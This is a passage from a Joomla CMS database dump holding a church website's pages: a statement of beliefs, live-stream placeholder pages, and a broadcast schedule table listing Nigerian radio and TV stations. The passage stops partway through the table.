(107, 316, 'Our Belief', 'our-belief', '<p>The Dream centre of the Life Oasis Int’l Church preaches Christ, His birth, His baptism, His works, His teachings, His crucifixion, His millennial reign, His White Throne Judgment, and the New Heavens and the New Earth, when He shall put all enemies under His feet and shall reign eternally, and the Church shall abide with Him forever.</p>\r\n<p>We believe in:</p>\r\n<ol>\r\n<li>The Divine inspiration and authority of the Holy Bible.</li>\r\n<li>The Trinity of the Persons in one Godhead.</li>\r\n<li>The Virgin Birth, Sinless Life, Atoning Death, Triumphant Resurrection, Ascension and Abiding Intercession of the Lord Jesus Christ, His Second Coming and Millennial Reign upon the earth.</li>\r\n<li>Justification and Sanctification of the believer through the Redemptive work of Christ.</li>\r\n<li>The sacrament of Baptism by immersion and of the Lord’s Supper (Holy Communion) with emphasis on the mystery and power of the Blood and Body (flesh) of Jesus at the communion table.</li>\r\n<li>Baptism of the Holy Spirit with the evidence of speaking in tongues and signs following Believers.</li>\r\n<li>The Nine Gifts of the Holy Spirit for the spiritual and physical benefits of the body of Christ (the Universal Church) as well as the Nine fold Fruit of the Spirit.</li>\r\n<li>Strong Church government under the leadership of the Local Pastor with the other four fold ministries contributing to prepare the members of the Church for the work of the Ministry (Service), for the building up of the Church towards the attainment of unity in the faith and in the knowledge of Jesus Christ, the Son of God and for the maturity of the Church to the full measure of the fullness of Christ.</li>\r\n<li>The possibility of falling from grace.</li>\r\n<li>The obligatory nature of the tithes and offerings.</li>\r\n</ol>', '', 1, 37, '2012-03-30 13:37:01', 196, '', '2017-05-02 22:59:14', 196, 0, '0000-00-00 00:00:00', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 6, 14, '', '', 1, 9275, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(108, 318, 'YouTube Live', 'live-streaming', '<p>{jumi [*1]}</p>', '', 1, 37, '2011-05-02 11:47:45', 196, '', '2017-03-05 08:15:47', 196, 196, '2018-06-18 13:24:54', '2011-05-02 11:47:45', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"0\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 9, 15, '', '', 1, 858364, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(109, 324, 'Periscope Live', 'periscope-live', '<p>{jumi [*3]}</p>', '', 1, 37, '2011-05-02 11:47:45', 196, '', '2017-03-05 06:51:06', 196, 196, '2019-08-13 06:00:45', '2011-05-02 11:47:45', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 7, 13, '', '', 1, 26274, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(110, 325, 'Facebook Live', 'facebook-live', '<p>{jumi [*4]}</p>', '', 1, 37, '2011-05-02 11:47:45', 196, '', '2017-03-05 06:52:20', 196, 0, '0000-00-00 00:00:00', '2011-05-02 11:47:45', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 12, '', '', 1, 24401, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(111, 327, 'Podcast ', 'pod', '<p>{jumi [*6]}</p>', '', 1, 37, '2011-05-02 11:47:45', 196, '', '2017-01-02 11:02:33', 196, 0, '0000-00-00 00:00:00', '2011-05-02 11:47:45', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"0\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 5, 10, '', '', 1, 12543, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(112, 329, 'Video on Demand', 'video-on-demand', '', '', 1, 37, '2016-11-12 18:10:14', 196, '', '2016-11-12 18:10:29', 196, 0, '0000-00-00 00:00:00', '2016-11-12 18:10:14', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 11, '', '', 1, 6186, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', '');
INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
(113, 332, 'Broadcast Schedule', 'broadcast-schedule', '<table class=\"MsoNormalTable\" style=\"border-collapse: collapse; mso-yfti-tbllook: 1184; mso-padding-alt: 0in 0in 0in 0in;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"text-align: center; line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\" align=\"center\"><b><span lang=\"EN-GB\" style=\"font-size: 11.5pt; mso-bidi-font-size: 11.0pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">STATION</span></b></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><b><span lang=\"EN-GB\" style=\"font-size: 11.5pt; mso-bidi-font-size: 11.0pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">PROGRAMME</span></b></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><b><span lang=\"EN-GB\" style=\"font-size: 11.5pt; mso-bidi-font-size: 11.0pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">FREQUENCY</span></b></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><b><span lang=\"EN-GB\" style=\"font-size: 11.5pt; mso-bidi-font-size: 11.0pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">TIME OF BROADCAST</span></b></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">FRCN lagos</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Metro FM</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">97.7 FM</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Mon – Fri   5.20 – 5:30am</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Harmony FM</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Kwara State</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">103.5FM</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Mon – Sat 6:00 – 6:15am</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Sun 8:15 – 8 :30am</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Unique fm</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">103.1fm</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Mon – Sat 6:15 – 6:30am</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">NTA Osogbo</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"> </p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">49 UHF</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Sat. 7.30 – 8:00pm</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\"> </span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">SPLASH FM</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; line-height: normal;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\"> </span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Mon: 6:15 - 6:30am</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">NTA Ile Ife</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">39 UHF</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Tue.6.45 -7.00pm</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Fri. 7.30 – 8.00pm</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">NTA Akure</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\"> </td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Saturday 7:00 – 7:30pm</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 95.25pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"127\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">BCOS</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Ibadan</span></p>\r\n</td>\r\n<td style=\"width: 117.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"156\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Living by the Answer</span></p>\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Joy of Every woman</span></p>\r\n</td>\r\n<td style=\"width: 85.5pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"114\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 11.5pt; font-family: \'Arial\',sans-serif; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-fareast-language: EN-GB;\">Channel   28</span></p>\r\n</td>\r\n<td style=\"width: 135.0pt; padding: .75pt .75pt .75pt .75pt;\" valign=\"top\" width=\"180\">\r\n<p class=\"MsoNormal\" style=\"line-height: normal; margin: 7.65pt 0in 7.65pt 0in;\"><span lang=\"EN-GB\" style=\"font-size: 